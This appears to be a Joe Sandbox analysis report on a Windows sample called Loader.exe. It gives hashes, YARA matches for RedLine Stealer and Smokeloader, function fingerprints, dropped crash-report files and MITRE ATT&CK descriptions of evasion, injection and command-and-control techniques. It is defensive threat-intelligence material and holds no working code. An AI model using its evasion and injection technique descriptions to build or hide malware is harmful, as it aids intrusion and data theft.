Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Loader.exe"
Imagebase:	0x400000
File size:	392'704 bytes
MD5 hash:	55F7F34A571A52CAEFB86F49F0246390
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2140034005.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2140310460.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:52:16
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 1568
Imagebase:	0xac0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 0068CE71 Relevance: .8, Instructions: 759COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Offset: 00689000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_66f000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0af7d95ef17bc2b23ce69130d3b6ecd5c727ec672251868e42a8efdaaa6338f7
Instruction ID: dc41d25691cab1529f8cae9b49f9f935c37cba3f9214d8ab7ab9de507e974379
Opcode Fuzzy Hash: 0af7d95ef17bc2b23ce69130d3b6ecd5c727ec672251868e42a8efdaaa6338f7
Instruction Fuzzy Hash: 4802EBA544E7C09FC7039B349CAAA917FB1AE13218B5E46CBC0C4CF4E3E259491AD767

Function 0068CF9E Relevance: .4, Instructions: 435COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Offset: 00689000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_66f000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84631b2cf0f41c6db510ba27f7398054e22dd4768d4cd8556b37fe7fb2701dee
Instruction ID: b822fb85eaeea8639a39577e03cb5a57eade71056f5ca7c4f9bbe7075352fe8a
Opcode Fuzzy Hash: 84631b2cf0f41c6db510ba27f7398054e22dd4768d4cd8556b37fe7fb2701dee
Instruction Fuzzy Hash: 2DB1006540E7C09FD7139B34896A6917FB6AE23214B1A46CBC0C0CF4F3E259591AC773

Function 0067B4B9 Relevance: .4, Instructions: 427COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1775164828.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0066F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_66f000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81d2032b079a458b9e070e0750c37b9a7952fff3ed60ea6c6886cdf05c174431
Instruction ID: b7589e90eabd830e1901fce4305e49c158eb9dcebbff03452b8c1a6fade82e52
Opcode Fuzzy Hash: 81d2032b079a458b9e070e0750c37b9a7952fff3ed60ea6c6886cdf05c174431
Instruction Fuzzy Hash: E2A1ED5145E3C14FE7138B70497A592BFB1AD2321430E96EFC8CA8F8A3D359994AD323

Function 0067B4B9 Relevance: .4, Instructions: 427COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1775164828.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Offset: 00671000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_66f000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81d2032b079a458b9e070e0750c37b9a7952fff3ed60ea6c6886cdf05c174431
Instruction ID: b7589e90eabd830e1901fce4305e49c158eb9dcebbff03452b8c1a6fade82e52
Opcode Fuzzy Hash: 81d2032b079a458b9e070e0750c37b9a7952fff3ed60ea6c6886cdf05c174431
Instruction Fuzzy Hash: E2A1ED5145E3C14FE7138B70497A592BFB1AD2321430E96EFC8CA8F8A3D359994AD323

Function 0068D0F8 Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Offset: 00689000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_66f000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04b6cda012d0d5dcbfc4b94da7730418d2a06306beceb5016d1153c1704476ee
Instruction ID: 24a508cb21175a6a3875e63354f2d200048ce70eede54d721e1294a8063d39a0
Opcode Fuzzy Hash: 04b6cda012d0d5dcbfc4b94da7730418d2a06306beceb5016d1153c1704476ee
Instruction Fuzzy Hash: 8F811FA541E7C09FD713AB34497A591BFB6AE1320875A86CBC0C0CF4E3E259591AC773

Function 0068D254 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Offset: 00689000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_66f000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fc47be84fab3f7039d35e777b7c300be4cfdcc17bced42152558a6fba54cb17
Instruction ID: 64e0d6d4de7441985fce52cdffad769ab8039bdb04efc47322bccced6bf50215
Opcode Fuzzy Hash: 2fc47be84fab3f7039d35e777b7c300be4cfdcc17bced42152558a6fba54cb17
Instruction Fuzzy Hash: 1571FE6541E7C0AFC713AB344D6A991BFB2AE1321875E86CBC0C0CF0E3D299591AC767

Function 0068D33C Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Offset: 00689000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_66f000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 504bfa22e9941025d66ff53db1fc7de0c6ea690327bdd4e09ed29a5a97101666
Instruction ID: 8a8246cd4828436010857481740226dda341b81924c784959f85ea4f06a78409
Opcode Fuzzy Hash: 504bfa22e9941025d66ff53db1fc7de0c6ea690327bdd4e09ed29a5a97101666
Instruction Fuzzy Hash: 2D512F6500E7C1AFC7139B345966692BFB1AE13209B2E56CBC4C0CF0E3D2695A1AC777

Function 0068D424 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Offset: 00689000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_66f000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3e172cf01a52ecfa335b9d15709b11fc77842ebdee30275487a0c3eeba9eac7
Instruction ID: ae44eeea30e55ebd9ba1765c94ec9b60b3416e1c99667c944e978cbd4895dace
Opcode Fuzzy Hash: e3e172cf01a52ecfa335b9d15709b11fc77842ebdee30275487a0c3eeba9eac7
Instruction Fuzzy Hash: D85143A540E7C19FD7139B344D66692BFB1AE2321876E56CBC0C0CE4E3E258191AC773

Function 0068CC28 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Offset: 00689000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_66f000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e3a2222942d0779f80b0a43486507eb2757ebd9eeee4fbf5c5b8cf50a720e8f
Instruction ID: 82fc673638696a202d1367573cadd232678176ec6c470ebc95ade9c0556c3d4a
Opcode Fuzzy Hash: 9e3a2222942d0779f80b0a43486507eb2757ebd9eeee4fbf5c5b8cf50a720e8f
Instruction Fuzzy Hash: 4631363245E7D99ED3236F788A55142BFA1EE1332472826EFC4C18E573C2609802C3A2

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Loader.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Loader.exe_72801e51da857bf085e3ec8cf8b25a6c7ba11dc_7285b65d_5b0e4285-cbf1-4292-9c53-376a5078d0c8\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER120C.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1336.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1366.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Windows Analysis Report
Loader.exe